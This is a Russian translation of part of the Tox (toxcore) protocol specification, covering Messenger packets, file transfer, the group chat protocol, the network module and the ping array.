Messenger заботится об отправке и получении сообщений, используя соединение, предоставляемое friend_connection. Модуль предоставляет возможность друзьям соединяться и делает его пригодным для использования в качестве мессенджера. Например, Messenger позволяет пользователям устанавливать псевдоним и сообщение о статусе, которые он затем передает друзьям, когда они находятся в сети. Он также позволяет пользователям отправлять сообщения друзьям и строит систему мгновенных сообщений поверх модуля

friend_connection нижнего уровня.

Messenger предлагает два способа добавления друга. Первый способ - добавить друга, используя только его долгосрочный открытый ключ. Этот способ используется, когда необходимо добавить друга, но по какой-то причине запрос на добавление не должен быть отправлен. Друга можно только добавить. Этот метод чаще всего используется для приема запросов на добавление в друзья, но может применяться и в других случаях. Если два друга добавят друг друга с помощью этой функции, они соединятся друг с другом. Добавление друга с помощью этого метода просто добавляет друга в friend_connection и создает для него новую запись в Messenger.
Второй способ добавления друга - это использование его Tox ID и сообщения, которое нужно отправить в запросе на добавление друга. При таком способе добавления друзей запрос на добавление в друзья с заданным сообщением будет отправлен тому собеседнику, чей Tox ID был добавлен. Метод похож на первый, за исключением того, что запрос на дружбу создается и отправляется другому пиру.
Когда соединение, связанное с другом Messenger, переходит в режим онлайн, ему отправляется пакет ONLINE. Друзья устанавливаются как онлайн только в том случае, если получен пакет ONLINE.
Как только друг переходит в режим онлайн, Messenger прекращает отправку запросов друзей этому другу, если он их отправлял, так как они являются избыточными для этого друга.
Друзья будут переведены в автономный режим, если либо соединение, связанное с ними, перейдет в автономный режим, либо если от друга будет получен пакет OFFLINE.
Пакеты Messenger отправляются другу, используя соединение с другом в режиме онлайн.
Если Messenger необходимо проверить, были ли получены другом какие-либо пакеты без потерь из следующего списка, например, для реализации квитанций для текстовых сообщений, можно использовать net_crypto. Номер пакета net_crypto, используемого для отправки пакетов, должен быть отмечен, а затем net_crypto проверит, находится ли нижняя часть массива отправки после этого номера пакета. Если это так, значит, друг их получил. Обратите внимание, что номера пакетов net_crypto могут переполниться через длительное время, поэтому проверка должна происходить в пределах 2**32 пакетов net_crypto, отправленных с одним и тем же соединением друга.
Получение сообщений для сообщений действий и обычных текстовых сообщений осуществляется путем добавления номера пакета net_crypto каждого сообщения вместе с номером получения в начало связанного списка, который есть у каждого друга по мере их отправки. Каждый цикл Messenger считывает записи снизу, удаляет записи и передает их клиенту, пока не будет достигнута запись, ссылающаяся на пакет, еще не полученный другом, когда это происходит, процесс останавливается.

Список пакетов Messenger:

15.1 ONLINE

длина: 1 байт

Length| Contents
---|---
1| uint8_t (0x18)

Отправляется другу при установлении соединения, чтобы он отметил нас в списке друзей как онлайн. Этот пакет и пакет OFFLINE необходимы, поскольку соединения friend_connections могут быть установлены с другими друзьями, не являющимися участниками группового чата. Эти два пакета используются для различения между этими друзьями, связанными с пользователем через групповые чаты, и настоящими друзьями, которые должны быть отмечены как онлайн в списке друзей.
При получении этого пакета Messenger покажет, что пользователь находится в сети.

15.2 OFFLIN

длина: 1 байт

Length| Contents
---|---
1| uint8_t (0x19)

Отправлено другу при удалении друга. Запрещает удаленному другу видеть нас в сети, если мы подключены к ним из-за группового чата.
Получив этот пакет, Messenger покажет этот одноранговый узел как не в сети.

15,3 NICKNAME

длина: от 1 байта до 129 байт.

Длина| Содержание
---|---
1| uint8_t(0x30)
[0, 128]| Псевдоним в виде строки байтов UTF8

Используется для отправки псевдонима пира другим. Этот пакет должен быть отправлен каждый раз каждому другу каждый раз, когда они выходят в сеть и каждый раз никнейм изменен.

15,4 STATUSMESSAGE

длина: от 1 байта до 1008 байт.

Длина| Содержание
---|---
1| uint8_t(0x31)
[0, 1007]| Сообщение о состоянии в виде строки байтов UTF8

Используется для отправки сообщения о состоянии однорангового узла другим. Этот пакет должен быть отправляется каждый раз каждому другу каждый раз, когда они выходят в сеть и каждый раз, когда сообщение о состоянии изменено.

15,5 USERSTATUS

длина: 2 байта

Длина| Содержание
---|---
1| uint8_t(0x32)
1| uint8_tстатус (0 = онлайн, 1 = нет, 2 = занят)

Используется для отправки статуса пользователя узла другим. Этот пакет должен быть отправлен каждый раз каждому другу каждый раз, когда они выходят в сеть и каждый раз, когда пользователь статус изменен.

15,6 TYPING

длина: 2 байта

Длина| Содержание
---|---
1| uint8_t(0x33)
1| uint8_tстатус ввода (0 = не печатать, 1 = печатать)

Используется, чтобы сообщить другу, печатает пользователь в данный момент или нет.

15,7 MESSAGE

Длина| Содержание
---|---
1| uint8_t(0x40)
[0, 1372]| Сообщение в виде строки байтов UTF8

Используется для отправки обычного текстового сообщения другу.

15,8 ACTION

Длина| Содержание
---|---
1| uint8_t(0x41)
[0, 1372]| Сообщение о действии в виде строки байтов UTF8

Используется для отправки сообщения действия (например, действия IRC) другу.

15,9 MSI

Длина| Содержание
---|---
1| uint8_t(0x45)
?| данные

Зарезервировано для использования Tox AV.

15.10 Пакеты, связанные с передачей файлов

15.10.1 FILE_SENDREQUEST

Length| Contents
---|---
1| uint8_t (0x50)
1| uint8_t file number
4| uint32_t file type
8| uint64_t file size
32| file id (32 bytes)
[0, 255]| filename as a UTF8 byte string

Обратите внимание, что тип и размер файла передаются в формате с обратным порядком байтов/сетевым байтом.

15.10.2 FILE_CONTROL

длина: 4 байта, если тип_управления не seek. 8 байт, если тип управления - seek.

Length| Contents
---|---
1| uint8_t (0x51)
1| uint8_t send_receive
1| uint8_t file number
1| uint8_t control_type
8| uint64_t seek parameter

send_receive равен 0, если управление направлено на отправляемый файл (пиром, посылающим управление файлом), и 1, если оно направлено на получаемый файл.
control_type может быть одним из: 0 = принять, 1 = приостановить, 2 = убить, 3 = seek.
Параметр seek включен только в том случае, если control_type равен seek (3).
Обратите внимание, что если он включен, параметр seek будет отправлен в формате big endian/network byte.

15.10.3 FILE_DATA

длина: от 2 до 1373 байт.

Length| Contents
---|---
1| uint8_t (0x52)
1| uint8_t file number
[0, 1371]| file data piece

Файлы передаются в Tox с помощью передачи файлов.

Чтобы инициировать передачу файла, друг создает и отправляет пакет FILE_SENDREQUEST другу, которому он хочет инициировать передачу файла.

Первая часть пакета FILE_SENDREQUEST - это номер файла. Номер файла - это номер, используемый для идентификации данной передачи файла. Поскольку номер файла представлен числом в 1 байт, максимальное количество одновременно передаваемых файлов, которые Tox может отправить другу, составляет 256. 256 передач файлов на одного друга достаточно, чтобы клиенты могли использовать такие приемы, как постановка файлов в очередь, если требуется отправить больше файлов.
256 исходящих файлов на одного друга означает, что между двумя пользователями может быть максимум 512 одновременных передач файлов, если считать вместе входящие и исходящие передачи файлов.
Поскольку номера файлов используются для идентификации передачи файла, при создании новой исходящей передачи файла экземпляр Tox должен убедиться, что используется номер файла, который не используется для другой исходящей передачи файла тому же другу. Номера файлов выбираются отправителем файла и остаются неизменными в течение всего времени передачи файла. Номер файла используется пакетами FILE_CONTROL и FILE_DATA для идентификации того, для какой передачи файла предназначены эти пакеты.
Вторая часть запроса на передачу файла - это тип файла. Это просто число, которое идентифицирует тип файла. Например, tox.h определяет тип файла 0 как обычный файл, а тип 1 как аватар, что означает, что клиент Tox должен использовать этот файл как аватар. Тип файла никак не влияет на способ передачи файла или поведение передачи файла. Он устанавливается клиентом Tox, который создает передачу файлов и отправляет их другу нетронутыми.
Размер файла указывает на общий размер файла, который будет передан. Размер файла UINT64_MAX (максимальное значение в uint64_t) означает, что размер файла не определен или неизвестен. Например, если бы кто-то хотел использовать передачу файлов Tox для потоковой передачи данных, он бы установил размер файла равным UINT64_MAX. Размер файла 0 действителен и ведет себя точно так же, как обычная передача файла.
Идентификатор файла - это 32 байта, которые могут быть использованы для уникальной идентификации передачи файла. Например, при передаче аватаров он используется как хэш аватара, чтобы получатель мог проверить, есть ли у него уже такой аватар для друга, что экономит полосу пропускания. Он также используется для идентификации прерванных передач файлов при перезагрузках toxcore (подробнее см. раздел передачи файлов в tox.h). Реализации передачи файлов не важно, каков идентификатор файла, так как он используется только вышестоящими программами.
Последней частью передачи файла является необязательное имя файла, которое используется для того, чтобы сообщить получателю имя файла.
Когда получен пакет FILE_SENDREQUEST, реализация проверяет его и отправляет информацию клиенту Tox, который решает, принять ему передачу файла или нет.
Чтобы отказаться или отменить передачу файла, он посылает пакет FILE_CONTROL с control_type 2 (kill).
Пакеты FILE_CONTROL используются для управления передачей файлов. Пакеты FILE_CONTROL используются для приема/отмены, приостановки, отмены/завершения и поиска передачи файлов. Параметр control_type указывает, что делает пакет управления файлом.

Параметры send_receive и номер файла используются для идентификации конкретной передачи файла. Поскольку номера файлов для исходящих и входящих файлов не связаны друг с другом, параметр send_receive используется для определения того, принадлежит ли номер файла отправляемым или принимаемым файлам. Если send_receive равен 0, номер файла соответствует файлу, отправляемому пользователем, посылающим пакет управления файлами. Если send_receive равен 1, он соответствует файлу, получаемому пользователем, отправляющим пакет управления файлами.

control_type указывает цель пакета FILE_CONTROL. control_type 0 означает, что пакет FILE_CONTROL используется для того, чтобы сообщить другу, что передача файла принята или что мы отменяем приостановку ранее приостановленной (нами) передачи файла. control_type 1 используется для того, чтобы сообщить другой стороне о приостановке передачи файла.
Если одна сторона приостанавливает передачу файла, то именно она должна отменить паузу. Если обе стороны приостанавливают передачу файла, то перед возобновлением передачи файла обе стороны должны снять паузу. Например, если отправитель приостанавливает передачу файла, получатель не должен иметь возможности ее отменить. Чтобы отменить приостановку передачи файла, используется control_type 0. Файлы могут быть приостановлены только тогда, когда они находятся в процессе передачи и были приняты.
control_type 2 используется для уничтожения, отмены или отказа от передачи файла. Когда получен FILE_CONTROL, целевая передача файла считается мертвой, немедленно стирается, а ее номер файла может быть использован повторно. Пир, отправивший FILE_CONTROL, должен также стереть целевую передачу файла со своей стороны. Этот тип управления может быть использован обеими сторонами передачи в любое время.
control_type 3, тип управления seek используется для того, чтобы сообщить отправителю файла начать отправку с индекса, отличного от 0. Он может быть использован только сразу после получения пакета FILE_SENDREQUEST и до принятия файла путем отправки FILE_CONTROL с control_type 0. Когда используется этот тип управления, к FILE_CONTROL добавляется дополнительное 8-байтовое число в формате big endian, которое отсутствует в других типах управления. Это число указывает на индекс в байтах от начала файла, с которого отправитель должен начать отправку файла. Цель этого типа управления - гарантировать, что файлы могут быть возобновлены при перезагрузке ядра. Клиенты Tox могут узнать, получили ли они часть файла, используя идентификатор файла, а затем с помощью этого пакета сообщить другой стороне, чтобы она начала отправку с последнего полученного байта. Если позиция поиска больше или равна размеру файла, пакет поиска недействителен, и принимающая сторона отбрасывает его.
Чтобы принять файл, Tox посылает пакет seek, если он необходим, а затем посылает пакет FILE_CONTROL с control_type 0 (accept), чтобы сообщить отправителю файла, что файл был принят.
Как только передача файла будет принята, отправитель файла начнет посылать данные файла последовательными фрагментами с начала файла (или с позиции из пакета поиска FILE_CONTROL, если таковой был получен).
Файловые данные отправляются с помощью пакетов FILE_DATA. Номер файла соответствует передаче файла, к которому принадлежат куски файла. Получатель считает, что передача файла завершена, как только получен чанк с размером данных файла, не равным максимальному размеру (1371 байт). Таким образом отправитель сообщает получателю, что передача файла завершена при передаче файлов, когда размер файла неизвестен (установлен в UINT64_MAX). Приемник также считает, что если объем полученных данных равен размеру файла, полученному в FILE_SENDREQUEST, то отправка файла завершена и файл успешно получен. Сразу после этого приемник освобождает номер файла, чтобы новая входящая передача файла могла использовать этот номер файла. Реализация должна отбрасывать все полученные дополнительные данные, которые превышают размер файла, полученного в начале.
При передаче файлов размером 0 отправитель посылает один пакет FILE_DATA с размером данных файла 0.
Отправитель узнает, что получатель успешно принял файл, проверив, получил ли друг последний отправленный пакет FILE_DATA (содержащий последний фрагмент файла). Net_crypto можно использовать для проверки получения пакетов, отправленных через него, сохраняя номер отправленного пакета и проверяя позже в net_crypto, был ли он получен или нет. Как только net_crypto сообщает, что другой получил пакет, передача файла считается успешной, стертой, а номер файла может быть повторно использован для отправки новых файлов.
Пакеты FILE_DATA должны отправляться так быстро, как только соединение net_crypto может их обработать, соблюдая контроль перегрузки.
Если друг выходит из сети, все передачи файлов очищаются в toxcore. Это упрощает работу toxcore, так как ему не приходится иметь дело с возобновлением передачи файлов. Это также упрощает работу клиентов, поскольку метод возобновления передачи файлов остается неизменным, даже если клиент перезапускается или toxcore теряет соединение с другом из-за плохого интернет- соединения.

15.11 Пакеты, относящиеся к групповому чату

Packet ID| Packet Name
---|---
0x60| INVITE_GROUPCHAT
0x61| ONLINE_PACKET
0x62| DIRECT_GROUPCHAT
0x63| MESSAGE_GROUPCHAT
0xC7| LOSSY_GROUPCHAT

Messenger также заботится о сохранении списка друзей и другой информации о друзьях, чтобы можно было закрыть и запустить toxcore, сохранив всех друзей, долгосрочный ключ и информацию, необходимую для повторного подключения к сети.
Важная информация, которую хранит messenger, включает: долгосрочный закрытый ключ, текущее значение nospam, открытые ключи друзей и все запросы друзей, которые пользователь отправляет в данный момент. Узлы DHT сети, TCP-реле и некоторые луковые узлы хранятся для облегчения повторного подключения.
В дополнение к этому может храниться множество дополнительных данных, таких как имена друзей, наше текущее имя пользователя, сообщения о статусе друзей, наше сообщение о статусе и т.д... могут быть сохранены. Точный формат сохранения toxcore будет объяснен позже.
TCP-сервер запускается из модуля мессенджера toxcore, если клиент включил его. TCP-сервер обычно запускается самостоятельно, как часть пакета узла bootstrap, но он может быть включен в клиентах. Если он включен в toxcore, Messenger добавит запущенный TCP-сервер к TCP-реле.
Messenger - это модуль, преобразующий код, который может соединяться с друзьями на основе открытого ключа, в настоящий мессенджер.

16 Группа

Групповые чаты в Tox работают путем временного добавления некоторых пиров (до 4), присутствующих в групповом чате, в качестве временных друзей friend_connection, которые удаляются при выходе из группового чата.
Каждый пир в групповом чате идентифицируется своим реальным долгосрочным открытым ключом, однако пиры передают свои открытые ключи DHT друг другу через групповой чат, чтобы ускорить соединение, поскольку пирам не нужно искать открытые ключи DHT друг друга с помощью onion, что произошло бы, если бы они добавили себя в качестве обычных друзей.
Преимуществом использования friend_connection является то, что групповым чатам не нужно иметь дело с такими вещами, как hole-punching, пиры только на TCP или другие низкоуровневые сетевые вещи. Однако недостатком является то, что каждый пир знает реальный долгосрочный открытый ключ и открытый ключ DHT, что означает, что такие групповые чаты должны использоваться только между друзьями.
Чтобы соединиться друг с другом, два пира должны добавить друг друга в список друзей. Это не является проблемой, если в групповом чате равное или меньшее число участников, чем 5, так как каждый из 5 участников добавит 4 других в список друзей. При большем количестве участников должен быть способ гарантировать, что участники смогут соединиться с другими участниками группового чата.
Поскольку максимальное количество пользователей в групповом чате, с которыми можно установить дружеские связи, равно 4, если все пользователи в групповом чате расположены в виде идеального круга и каждый пользователь соединяется с двумя пользователями, которые находятся ближе всего справа от него и двумя пользователями, которые находятся ближе всего слева от него, пользователи должны образовать хорошо связанный круг пользователей.
Групповые чаты в toxcore делают это путем одновременной подстановки реального долгосрочного открытого ключа пира и всех остальных в группе (наш PK - PK другого пира) и нахождения двух пиров, для которых результат этой операции наименьший. Затем операция инвертируется (другой PK - наш PK), и эта операция повторяется со всеми открытыми ключами сверстников в группе. Выбираются 2 пира, для которых результат снова наименьший.
В результате получаются 4 пира, которые затем добавляются в качестве дружеского соединения и ассоциируются с группой. Если каждый пир в группе сделает это, они образуют круг идеально связанных пиров.
Когда одноранговые пользователи соединены друг с другом в круг, они передают друг другу сообщения. Каждый раз, когда пир покидает группу или присоединяется новый пир, каждый участник чата пересчитывает пиров, с которыми он должен соединиться.
Чтобы присоединиться к групповому чату, пользователь должен сначала получить приглашение от своего друга. Чтобы создать групповой чат, собеседник сначала создает групповой чат, а затем приглашает в него людей. После того как их друзья окажутся в групповом чате, они смогут пригласить в него других своих друзей и так далее.
Для создания группового чата сверстник генерирует случайный 32-байтовый идентификатор, который будет использоваться для уникальной идентификации этого группового чата. 32 байта достаточно для того, чтобы при случайной генерации с помощью безопасного генератора случайных чисел каждый созданный групповой чат имел свой идентификатор. Цель этого 32-байтового идентификатора состоит в том, чтобы у пользователей был способ идентифицировать каждый групповой чат, чтобы они не могли, например, дважды присоединиться к групповому чату.
Групповой чат также будет иметь беззнаковый тип размером 1 байт. Этот тип указывает, к какому типу относится групповой чат; в настоящее время существуют следующие типы:

0: текст 1: аудио

Текстовые групповые чаты - это только текст, а аудио указывает на то, что групповой чат поддерживает отправку аудио, а также текста.
Групповой чат также идентифицируется уникальным беззнаковым 2-байтовым целым числом, которое в toxcore соответствует индексу группового чата в массиве, в котором он хранится. Каждый групповой чат в текущем экземпляре должен иметь свой номер. Этот номер используется пирами groupchat, которые непосредственно подключены к нам, чтобы сообщить нам, какие пакеты предназначены для какого groupchat. Вот почему каждый пакет groupchat содержит номер groupchat как часть пакета. Размещение 32-байтового идентификатора группового чата в каждом пакете привело бы к значительному увеличению потерь пропускной способности, поэтому вместо него используются номера групповых чатов.
Использование номера группы в качестве индекса массива, используемого для хранения экземпляров groupchat, рекомендуется, поскольку такой доступ обычно наиболее эффективен и гарантирует, что каждый groupchat имеет уникальный номер группы.
При создании нового groupchat пир добавляет себя в качестве пира groupchat с номером пира 0 и собственным долгосрочным открытым ключом и открытым ключом DHT.

Пригласительные пакеты:

Пакет приглашения:

Length| Contents
---|---
1| uint8_t (0x60)
1| uint8_t (0x00)
2| uint16_t group number
33| Group chat identifier

Идентификатор группового чата состоит из 1-байтового типа и 32-байтового идентификатора, соединенных вместе.

Пакет ответа

Length| Contents
---|---
1| uint8_t (0x60)
1| uint8_t (0x01)
2| uint16_t group number (local)
2| uint16_t group number to join
33| Group chat identifier

Чтобы пригласить друга в групповой чат, ему отправляется пакет приглашения. Эти пакеты отправляются с помощью Messenger (если вы посмотрите на раздел идентификаторов пакетов Messenger, там указаны все идентификаторы пакетов группового чата). Обратите внимание, что все номера, как и все другие номера, отправляемые с помощью пакетов Tox, отправляются в формате big endian.
Номер группового чата - это, как объяснялось выше, номер, используемый для уникальной идентификации экземпляра группового чата от всех других экземпляров группового чата, которые есть у собеседника. Он передается в пакете приглашения, поскольку он необходим другу для отправки ответных пакетов, связанных с групповым чатом.
Далее следует 1-байтовый тип с 32-байтовым идентификатором группового чата.
Чтобы отклонить приглашение, друг, получивший его, просто проигнорирует и отбросит его.
Чтобы принять приглашение, друг создаст свой собственный экземпляр groupchat с 32-байтовым идентификатором groupchat и 1-байтовым типом, отправленным в запросе, и пошлет ответный пакет приглашения. Друг также добавит того, кто отправил приглашение, в качестве временного приглашенного соединения groupchat.
Первый номер группы в ответном пакете - это номер группы чата, который только что создал приглашенный друг. Второй номер группы - это номер группового чата, который был отправлен в запросе на приглашение. Далее следует 1-байтовый тип и 32-байтовый идентификатор группового чата, которые были отправлены в запросе на приглашение.
Когда одноранговый пользователь получает пакет ответа на приглашение, он проверяет, соответствует ли идентификатор группы, отправленный в ответ, идентификатору группового чата с номером группы, также отправленным в ответ. Если все в порядке, будет сгенерирован новый номер peer для peer, который отправил пакет с ответом на приглашение. Затем пир со сгенерированным номером пира, его долгосрочным открытым ключом и открытым ключом DHT будет добавлен в список пиров группового чата. Также будет отправлен новый пакет peer, чтобы сообщить всем участникам группового чата о новом peer. Пир также будет добавлен в качестве временного приглашенного соединения группового чата.
Номера сверстников используются для уникальной идентификации каждого сверстника в групповом чате. Они используются в пакетах сообщений группового чата, чтобы получающие их пользователи могли узнать, кто или какой пользователь группового чата их отправил. Поскольку пакеты группового чата передаются, они должны содержать что-то, по чему другие смогут определить отправителя. Поскольку размещение 32-байтного открытого ключа в каждом пакете было бы расточительным, вместо него используется 2-байтный номер сверстника. Каждый участник группового чата имеет уникальный номер. Toxcore генерирует каждый пиринговый номер случайным образом, но следит за тем, чтобы новые генерируемые пиринговые номера не были равны текущим, уже используемым другими пирингами в групповом чате. Если два пользователя присоединяются к групповому чату с двух разных конечных точек, существует небольшая вероятность того, что обоим будет присвоен один и тот же номер, однако на практике эта вероятность достаточно мала и не является проблемой.
Временные приглашенные подключения к групповому чату - это подключения к пригласителю группового чата, используемые сверстниками группового чата для загрузки в групповой чат. Это то же самое, что и соединения со сверстниками через дружеские соединения, за исключением того, что они отбрасываются после того, как сверстник полностью подключен к групповому чату.

Пакет Peer Online:

Length| Contents
---|---
1| uint8_t (0x61)
2| uint16_t group number (local)
33| Group chat identifier

Пакет Peer покинул канал:

Length| Contents
---|---
1| uint8_t (0x62)
2| uint16_t group number (local)
1| uint8_t (0x01)

Чтобы соединение группового чата работало, оба участника группового чата должны пытаться напрямую соединиться друг с другом.
Соединения группового чата устанавливаются, когда оба собеседника, желающие соединиться друг с другом, либо создают новое дружеское соединение для соединения друг с другом, либо повторно используют существующее дружеское соединение, которое соединяет их вместе (если они друзья или уже соединены вместе из-за другого группового чата).
Как только соединение с другим сверстником будет открыто, ему будет отправлен пакет peer online. Цель онлайн-пакета - сообщить сверстнику, что мы хотим установить с ним соединение группового чата, и сообщить ему номер нашего экземпляра группового чата. Пакет peer online содержит номер группы, тип группы и 32-байтовый идентификатор группового чата. Номер группы - это номер группы, который одноранговый пользователь имеет для группы с идентификатором группы, отправленным в пакете.
Когда обе стороны отправляют пакет online другому peer, устанавливается соединение.
Когда онлайн-пакет получен, номер группы для связи с ней сохраняется. Если соединение со сверстником уже установлено (уже получен пакет online), то пакет отбрасывается. Если групповое соединение с этим сверстником не установлено, пакет отбрасывается. Если это первое групповое соединение с данной группой, которое мы устанавливаем, посылается пакет запроса peer. Это делается для того, чтобы мы могли получить список пиров из группы.
Пакет peer leave отправляется peer непосредственно перед уничтожением группового соединения. Он используется только для того, чтобы сообщить другой стороне, что соединение мертво, если соединение с другом используется не только для группового чата (другой групповой чат, соединение с другом). В противном случае, другой пир увидит, что соединение с другом перешло в автономный режим, что побудит его прекратить его использование и убить связанное с ним групповое соединение.

Пакет запроса от пира:

Length| Contents
---|---
1| uint8_t (0x62)
2| uint16_t group number
1| uint8_t (0x08)

Peer response packet:

Length| Contents
---|---
1| uint8_t (0x62)
2| uint16_t group number
1| uint8_t (0x09)
variable| Repeated times number of peers: Peer info

The Peer info structure is as follows:

Length| Contents
---|---
2| uint16_t peer number
32| Long term public key
32| DHT public key
1| uint8_t Name length
[0, 255]| Name

Title response packet:

Length| Contents
---|---
1| uint8_t (0x62)
2| uint16_t group number
1| uint8_t (0x0a)
variable| Title

Message packets:

Length| Contents
---|---
1| uint8_t (0x63)
2| uint16_t group number
2| uint16_t peer number
4| uint32_t message number
1| uint8_t with a value representing id of message
variable| Data

Lossy Message packets:

Length| Contents
---|---
1| uint8_t (0xc7)
2| uint16_t group number
2| uint16_t peer number
4| uint16_t message number
1| uint8_t with a value representing id of message
variable|

Если получен пакет запроса от собеседника, получатель берет свой список собеседников и создает пакет ответа от собеседника, который затем отправляется другому собеседнику. Если в групповом чате слишком много собеседников, и пакет ответа собеседника будет больше, чем максимальный размер пакетов дружеского соединения (1373 байта), в ответ отправляется более одного пакета ответа собеседника. Пакет ответа Title также отправляется обратно. Таким образом пир, присоединившийся к групповому чату, узнает список пиров в групповом чате и название группового чата сразу после присоединения.
Пакеты ответа пиров просты и содержат информацию о каждом пире (номер пира, реальный открытый ключ, открытый ключ DHT, имя), приложенную друг к другу. Ответ на заголовок также прост.
Максимальная длина имен пиров группового чата и названия группового чата составляет 128 байт. Это такая же максимальная длина, как и у имен во всем toxcore.
Когда пир получает пакет(ы) ответа пира, он добавляет каждого из полученных пиров в свой список пиров groupchat, находит 4 ближайших к нему пира и создает с ними соединения groupchat, как было описано ранее.
Чтобы найти свой номер сверстника, сверстник найдет себя в списке полученных сверстников и использует присвоенный ему номер сверстника как свой собственный.
Пакеты сообщений используются для отправки сообщений всем коллегам в групповом чате. Чтобы отправить пакет сообщений, сверстник сначала берет свой номер сверстника и сообщение, которое он хочет отправить. Каждый отправленный пакет сообщений будет иметь номер сообщения, равный номеру последнего отправленного сообщения + 1. Как и все остальные номера (номер группового чата, номер peer) в пакете, номер сообщения в пакете будет в формате big endian. Когда пакет сообщений получен, принимающий его пир возьмет номер сообщения в пакете и посмотрит, больше ли он, чем тот, который он сохранил для пира с номером пира. Если это первый пакет Message, полученный для данного peer, то эта проверка опускается. Номер сообщения используется для того, чтобы узнать, был ли уже получен и передан пакет сообщения, чтобы предотвратить зацикливание пакетов в групповом чате. Если проверка номера сообщения говорит, что пакет уже был получен, то пакет отбрасывается. Если он еще не был получен, то пакет Message с сообщением отправляется (ретранслируется) всем текущим групповым соединениям (обычные групповые соединения + временные приглашенные групповые соединения), кроме того, от которого он был получен. Единственное, что должно измениться в пакете сообщения при его передаче - это номер группы.

16.1 Идентификаторы сообщений
16.1.1 ping (0x00)

Отправляется примерно каждые 60 секунд каждым пиром. Не содержит данных.

16.1.2 new_peer (0x10)

Добавление нового пира в чат

Length| Contents
---|---
2| uint16_t Peer number
32| Long term public key
32| DHT public key

16.1.3 kill_peer (0x11)

Length| Contents
---|---
2| uint16_t Peer number

16.1.4 Смена имени (0x30)

Length| Contents
---|---
variable| Name (namelen)

16.1.5 Иззменение названия чата (0x31)

Length| Contents
---|---
variable| Title (titlelen)

16.1.6 Собщение чата (0x40)

Length| Contents
---|---
variable| Message (messagelen)

16.1.7 Action (/me) (0x41)

Length| Contents
---|---
variable| Message (messagelen)

Ping-сообщения должны отправляться каждые 60 секунд каждым peer. Так другие участники узнают, что они все еще активны.

Когда присоединяется новый участник, участник, который пригласил присоединившегося участника, посылает сообщение о новом участнике, чтобы предупредить всех, что в чате появился новый участник. Когда получено сообщение о новом пире, пир в этом пакете должен быть добавлен в список пиров.

Сообщение Kill peer используется для того, чтобы сообщить, что пользователь покинул групповой чат. Оно отправляется тем, кто покидает групповой чат, непосредственно перед выходом из него.

Сообщения об изменении имени используются для изменения или установки имени отправляющего их пира. Они также посылаются присоединяющимся пиром сразу после получения списка пиров, чтобы сообщить другим свое имя.

Пакеты изменения названия используются для изменения названия группового чата и могут быть отправлены любым участником группового чата.

Сообщения чата и действия используются сверстниками группового чата для отправки сообщений другим участникам группового чата.

Пакеты сообщений с потерями используются для отправки аудиопакетов другим участникам группового аудиочата. Пакеты с потерями работают так же, как и обычные сообщения группового чата: они передаются всем участникам группового чата, пока все их не получат.

Некоторые различия между ними заключаются в том, что, во-первых, номер сообщения - это целое число в 2 байта. Если бы я хотел улучшить протокол групповых чатов, я бы сделал номер сообщения для обычных пакетов сообщений двухбайтовым. 1 байт означает, что одновременно может быть получено только 256 пакетов. С задержками в groupchats и 256 пакетами, соответствующими менее чем одному кадру видео высокого качества, это не будет работать. Вот почему было выбрано 2 байта.

Обратите внимание, что номер сообщения, как и все остальные номера в пакете, имеет формат big endian.

При получении пакета с потерями одноранговый компьютер сначала проверяет, не был ли он уже получен. Если нет, то пакет будет добавлен в список полученных пакетов, затем он будет передан своему обработчику, а затем отправлен двум ближайшим к отправителю пользователям groupchat, не являющимся отправителями. Причина, по которой для обычных пакетов сообщений используется 2, а не 4 (ну, 3, если мы не являемся отправителем), заключается в том, что это снижает использование полосы пропускания без снижения качества получаемого аудиопотока за счет пакетов с потерями. Пакеты сообщений также отправляются относительно редко, так что изменение этого параметра на 2 будет иметь минимальное влияние на использование полосы пропускания.

Чтобы проверить, был ли получен пакет, сохраняются последние до 65536 номеров полученных пакетов, текущие группы хранят последние 256 номеров пакетов, но это потому, что в настоящее время это только аудио. Если будет добавлено видео, то есть будет отправляться гораздо большее количество пакетов, это число будет увеличено. Если номер пакета находится в этом списке, значит он был получен.

Именно так работают групповые чаты в Tox.

17 network

Модуль network - это самый нижний по уровню в toxcore, от которого зависит все остальное. Этот модуль, по сути, является оберткой UDP сокета, служит сортировочной площадкой для пакетов, полученных сокетом, инициализирует и деинициализирует сокет. Он также содержит множество функций, связанных с сокетами, сетями и некоторые другие функции, например, функцию монотонного времени, используемую другими модулями toxcore.
В этом модуле следует отметить определение максимального размера UDP-пакета (MAX_UDP_PACKET_SIZE), который устанавливает максимальный размер UDP-пакета, который может отправлять и получать toxcore. Список всех идентификаторов UDP пакетов: NET_PACKET_*. Идентификаторы UDP-пакетов - это значение первого байта каждого UDP-пакета, и именно так каждый пакет сортируется в нужный модуль, который может его обработать. networking_registerhandler() используется модулями более высокого уровня для того, чтобы сообщить сетевому объекту, какие пакеты отправлять в какой модуль через обратный вызов.
Она также содержит структуры данных, используемые для ip-адресов в toxcore. IP4 и IP6 - это структуры данных для ipv4 и ipv6 адресов, IP - это структура данных для хранения любого из них (семейство может быть установлено в AF_INET (ipv4) или AF_INET6 (ipv6). Оно может быть установлено в другое значение, например TCP_ONION_FAMILY, TCP_INET, TCP_INET6 или TCP_FAMILY, которые являются недопустимыми значениями в сетевых модулях, но допустимыми значениями в некоторых других модулях и обозначают специальный тип ip), а IP_Port хранит структуру данных IP с портом.
Поскольку сетевой модуль взаимодействует непосредственно с базовой операционной системой с помощью своих функций сокетов, он имеет код для работы на windows, linux и т.д... в отличие от большинства модулей, которые находятся на более высоком уровне.
В настоящее время сетевой модуль использует метод опроса для чтения из UDP сокета. Функция networking_poll() вызывается для чтения всех пакетов из сокета и передачи их в обратные вызовы, установленные с помощью функции networking_registerhandler(). Причина, по которой используется опрос, просто в том, что так было проще написать, другой метод здесь был бы лучше.
Цель этого модуля - предоставить простой интерфейс к UDP сокету и другим функциям, связанным с сетью.

18 Массив Ping

Ping array - это массив, используемый в toxcore для хранения данных для пингов. Он позволяет хранить произвольные данные, которые можно извлечь позже, передав 8-байтовый идентификатор пинга, который был возвращен при сохранении данных. Он также освобождает данные из пингов, которые старше, чем задержка истечения срока действия пинга, установленная при инициализации массива.

Массивы пингов инициализируются параметрами size и timeout. Параметр size обозначает максимальное количество записей в массиве, а timeout - количество секунд для хранения записи в массиве. Таймаут и размер должны быть больше 0.

